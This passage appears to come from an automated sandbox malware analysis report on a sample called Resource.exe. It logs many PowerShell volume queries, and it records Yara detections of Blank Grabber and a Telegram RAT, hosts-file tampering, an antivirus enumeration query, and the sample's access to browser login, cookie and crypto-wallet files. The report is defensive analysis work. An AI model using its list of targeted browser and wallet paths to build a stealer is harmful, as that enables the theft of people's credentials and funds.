Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\Resource.exe

Code function: 0_2_00007FF6E60AC460 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6E60AC460

Source: C:\Users\user\Desktop\Resource.exe

Code function: 0_2_00007FF6E60C6370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF6E60C6370

Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe

Code function: 103_2_00007FF6186048CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

103_2_00007FF6186048CC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\Resource.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2019140558.00000203A2F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2473117545.0000020AB3C0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2019140558.00000203A2F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2467713655.0000020AB46E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Resource.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Resource.exe PID: 6048, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI66322\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Resource.exe PID: 6048, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxxz
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB41C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sers\user\AppData\Roaming\Exodus\exodus.walletan
Source: Resource.exe, 00000001.00000002.2476060853.0000020AB41C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sers\user\AppData\Roaming\Ethereum\keystored.lnk
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodusz
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: Resource.exe, 00000001.00000003.2182427502.0000020AB3C3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
